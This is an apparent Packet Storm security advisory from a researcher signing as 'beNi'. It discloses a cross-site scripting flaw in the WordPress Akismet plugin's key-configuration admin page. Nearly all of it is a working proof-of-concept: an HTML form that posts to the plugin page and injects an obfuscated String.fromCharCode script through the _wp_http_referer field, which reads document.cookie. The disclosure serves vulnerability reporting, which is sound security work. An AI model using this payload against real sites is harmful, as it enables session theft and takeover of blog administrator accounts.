WordPress Akismet suffers from a cross site scripting vulnerability.
c58b33c5a88700c17f8a49c1e3dd50be6bbe12464020d73ce653e8e1337cc2b4-------------------- CODE -----------------------------
<html>
<body>
<form
action="http://blog.url/wp-admin/plugins.php?page=akismet-key-config"
method="post" id="akismet-conf">
<input name="_wpnonce" value="'" type="text">
<input name="_wp_http_referer"
value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"
type="text">
<input id="key" name="key" size="15" maxlength="12" value="1337">
<input name="submit" value="Update options »" type="submit">
</form>
</body>
</html>
-------------------- EOC ------------------------------
http://mybeni.rootzilla.de/mybeNi/2007/wordpress_akismet_xss_security_flaw_beware_of_the_dog/
--
benjamin "beNi"
mybeNi websecurity - http://mybeNi.rootzilla.de/mybeNi
(coolest guy in da hood)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed